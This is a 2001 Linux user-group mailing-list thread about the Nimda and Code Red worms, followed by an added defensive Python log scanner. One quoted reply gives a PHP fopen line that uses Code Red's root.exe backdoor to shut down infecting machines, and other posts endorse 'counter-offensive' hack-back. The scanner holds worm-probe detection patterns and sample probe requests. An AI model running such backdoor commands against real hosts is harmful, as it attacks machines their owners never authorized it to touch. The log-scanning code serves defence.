[NTLUG:Discuss] nimba counter attack without PHP?
Richard Geoffrion
richard at rain.lewisville.tx.us
Wed Sep 19 11:26:36 CDT 2001
So what can I do if I don't have PHP installed?
----- Original Message -----
From: "Paul Ingendorf" <pauldy at wantek.net>
To: <discuss at ntlug.org>
Sent: Wednesday, September 19, 2001 7:46 AM
Subject: RE: [NTLUG:Discuss] New IIS Virus
> I have custom error logs setup and I use php files. In these php files I
> check if the request url is the default.ida etc. If it is I use the old
> fopen command to send a get request like so.
>
> fopen("http://" . $REMOTE_ADDR . "/scripts/root.exe?/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5", "r");
>
> This basically shuts the machine down via the backdoor Code Red II installs.
> I think I have posted the code in here before. If you would like I can
> forward it to you.
>
> --
> -->> mailto:pauldy at wantek.net
> -->> http://www.wantek.net/
> Running ....... Cos anything else would be a waste...
> `:::' ....... ......
> ::: * `::. ::'
> ::: .:: .:.::. .:: .:: `::. :'
> ::: :: :: :: :: :: :::.
> ::: .::. .:: ::. `::::. .:' ::.
> .:::.....................::' .::::..
>
>
> -----Original Message-----
> From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org]On Behalf
> Of Daniel Hauck
> Sent: Wednesday, September 19, 2001 7:20 AM
> To: discuss at ntlug.org
> Subject: Re: [NTLUG:Discuss] New IIS Virus
>
>
> How about threatening the virus-spreading server owners with legal action?
>
> Which/what script do you use to shut them down?
>
> ----- Original Message -----
> From: "Paul Ingendorf" <pauldy at wantek.net>
> To: <discuss at ntlug.org>
> Sent: Wednesday, September 19, 2001 7:04 AM
> Subject: RE: [NTLUG:Discuss] New IIS Virus
>
>
> > I can attest that approximately 20% of what is in my log files are actual
> > webservers and not just your average joe running iis at home. Of course
> > people on different subnets mileage may vary. Which is something that gets
> > my goat because I know competent admins who are out of work right now and
> > many of the servers hitting me now are the ones I've been e-mailing for
> > about a month and some change now about fixing their servers on codered.
> > Plus my script has been shutting most of their machines down daily for the
> > past month and they still don't get the hint. Oh well I'll be writing a
> > counter script soon much like the last one probably just to shut their
> > machine down once I figure out how this thing works and if that will be
> > sufficient.
> >
> > --
> > -->> mailto:pauldy at wantek.net
> > -->> http://www.wantek.net/
> >
> >
> > -----Original Message-----
> > From: discuss-admin at ntlug.org [mailto:discuss-admin at ntlug.org]On Behalf
> > Of Daniel Hauck
> > Sent: Wednesday, September 19, 2001 6:37 AM
> > To: discuss at ntlug.org
> > Subject: Re: [NTLUG:Discuss] New IIS Virus
> >
> >
> > Your statement is incomplete and/or inaccurate. A majority of what I have
> > seen are home users... users (not administrators) at home. Microsoft has
> > unleashed too much power to the every-day user.
> >
> > I know we have had this discussion before, so please restrain yourself
> > better than I am, but I still hold that Microsoft should bear some
> > responsibility over this. There are thousands of Windows machines out there
> > running IIS and the owner/user doesn't even know about it. It's sad.
> >
> > I would like to open up discussion about implementing "counter-agents."
> > Clearly, there is little to no risk of prosecution and I think
> > "self-defence" is a valid argument. I'd be happy to host counter-offensive
> > software on my server while I still have port 80 access.
> >
> > ----- Original Message -----
> > From: "Aaron Goldblatt" <aaron at goldblatt.net>
> > To: <discuss at ntlug.org>
> > Sent: Wednesday, September 19, 2001 6:26 AM
> > Subject: Re: [NTLUG:Discuss] New IIS Virus
> >
> >
> > > > Has anyone been getting hits on their machines from this new virus? I
> > >
> > > I'll leave others to answer your direct question, but I'll observe that this
> > > Nimda thing is harder on non-IIS servers than previous viruses. Stuff like
> > > Code Red produced a few dozen log entries a day. This is producing thousands
> > > of lines a day. Nobody except viruses hit my web server anyway, so the
> > > effect is minimal, but I do use the machine for other things, in addition to
> > > just being my web server.
> > >
> > > It isn't Windows administration or even Windows administrators that bother me
> > > so much as stupid Windows administration, and stupid Windows administrators.
> > > Inattentive == stupid.
> > > ag
> > > _______________________________________________
> > > http://www.ntlug.org/mailman/listinfo/discuss
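An added example, not code from anyone in the thread: since the question is what to do on a server without PHP, this Python script takes the defensive route instead of a counter-attack. It scans an Apache access log for the probe signatures named above (default.ida for Code Red, root.exe/cmd.exe with directory traversal for Nimda), counts probes per source address so the noisiest sources can be dropped at the firewall or reported to their admins, and filters the worm noise out so the real traffic is visible again. The log lines are constructed samples using documentation address ranges.

```python
import re
from collections import Counter, defaultdict

# Constructed sample Apache access-log lines (not from the original thread).
SAMPLE_LOG = """\
192.0.2.10 - - [19/Sep/2001:07:04:12 -0500] "GET /default.ida?XXXXXXXX%u9090%u6858 HTTP/1.0" 404 281
192.0.2.10 - - [19/Sep/2001:07:04:13 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 272
192.0.2.10 - - [19/Sep/2001:07:04:13 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 270
192.0.2.10 - - [19/Sep/2001:07:04:14 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 282
192.0.2.10 - - [19/Sep/2001:07:04:14 -0500] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296
198.51.100.7 - - [19/Sep/2001:07:20:01 -0500] "GET /index.html HTTP/1.1" 200 1043
198.51.100.7 - - [19/Sep/2001:07:20:05 -0500] "GET /default.ida?NNNNNNNN%u9090 HTTP/1.0" 404 281
"""

# Common log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Request-path patterns, in the order they are tested: Code Red's .ida probe,
# then Nimda's root.exe/cmd.exe requests and ..\ / ../ traversal attempts.
SIGNATURES = [
    ("codered", re.compile(r"/default\.ida", re.I)),
    ("nimda", re.compile(r"/root\.exe|/cmd\.exe|\.\.%5c|\.\./", re.I)),
]

def classify(path):
    """Return the worm family a request path matches, or None for normal traffic."""
    for name, rx in SIGNATURES:
        if rx.search(path):
            return name
    return None

def scan_log(text):
    """Return ({ip: Counter({family: n})}, unparsed_line_count) for the log text."""
    hits = defaultdict(Counter)
    unparsed = 0
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            unparsed += 1          # a malformed line is counted, never silently dropped
            continue
        family = classify(m["path"])
        if family:
            hits[m["ip"]][family] += 1
    return dict(hits), unparsed

def noisy_sources(hits, threshold=3):
    """IPs with at least `threshold` probes, busiest first: firewall/abuse-report candidates."""
    totals = {ip: sum(c.values()) for ip, c in hits.items()}
    return [ip for ip, n in sorted(totals.items(), key=lambda kv: (-kv[1], kv[0])) if n >= threshold]

def filter_noise(text):
    """The log with every worm probe removed, so legitimate requests stand out."""
    return [l for l in text.splitlines() if (m := LOG_RE.match(l)) and not classify(m["path"])]
```

Run it against a real access log by reading the file into `scan_log` instead of `SAMPLE_LOG`; the threshold in `noisy_sources` keeps a one-off scan from a home machine out of the block list.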